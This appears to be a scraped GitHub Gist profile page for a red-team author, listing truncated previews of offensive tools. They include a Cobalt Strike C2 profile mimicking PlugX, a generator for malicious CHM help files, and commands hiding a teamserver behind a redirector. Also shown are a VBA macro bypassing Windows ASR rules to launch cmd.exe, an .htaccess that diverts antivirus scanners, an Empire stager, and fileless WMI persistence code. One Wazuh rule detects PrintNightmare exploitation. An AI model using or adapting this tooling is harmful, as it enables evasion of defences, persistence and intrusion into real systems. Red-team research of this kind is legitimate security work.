Skip to content

Instantly share code, notes, and snippets.

Working from home

Rahmat Nurfauzi infosecn1nja

Working from home
View GitHub Profile
infosecn1nja / plugx.profile
Last active Apr 19, 2022
Cobalt Strike Malleable C2 Profile - PlugX
View plugx.profile
# PlugX Profile
# Author: @infosecn1nja
set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
stage {
infosecn1nja / printernightmare_cve_2021_34527.xml
Last active Jul 6, 2021
Wazuh Rules: PrinterNightmare CVE-2021-34527 Exploit Detection
View printernightmare_cve_2021_34527.xml
- PrinterNightmare CVE-2021-34527 Exploit Detection
- Created by Rahmat Nurfauzi (@infosecn1nja).
- This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2.
<group name="sysmon,">
<rule id="99948" level="15">
<field name="win.eventdata.Image">\\\\spoolsv.exe$</field>
<field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field>
infosecn1nja /
Last active Jul 11, 2020
This script will generate malicious Compiled HTML Help file (.CHM)
import argparse
import re, random
import string, os, os.path
def rand_num(min, max):
return random.randrange(min, max)
def gen_str(size):
return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
View gist:97b4b2e5132ae9d3d18448b3f7f7aa93
Make a rule that allows port 80/443 access only from redirector:
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
Change default port teamserver :
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver
infosecn1nja / gist:04ab2d8ea15f98880bbf7b70168fa3dd
Last active May 5, 2022
APT Group/Red Team Weaponization Phase
View gist:04ab2d8ea15f98880bbf7b70168fa3dd
APT Group/Red Team Weaponization Phase
C2 tools :
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit
infosecn1nja / ASR Rules Bypass.vba
Last active Jan 18, 2023
ASR rules bypass creating child processes
View ASR Rules Bypass.vba
' ASR rules bypass creating child processes
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
infosecn1nja / Inject.cs
Created Jun 19, 2018
DotNetToJScript Build Walkthrough
View Inject.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
public TestClass()
infosecn1nja / .htaccess
Created Jun 9, 2018 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
View .htaccess
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here:
RewriteCond expr "-R ''" [OR]
RewriteCond expr "-R ''" [OR]
infosecn1nja /
Created Jun 7, 2018
Empire stagers module to generates a squiblytwo and starfighters launcher.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]): = {
'Name': 'wmic_xsl_starfighters',
'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],
infosecn1nja / WMI-Persistence.ps1
Created May 14, 2018
Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
View WMI-Persistence.ps1
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
$EventFilterName = "Fileless WMI Persistence SystemUptime"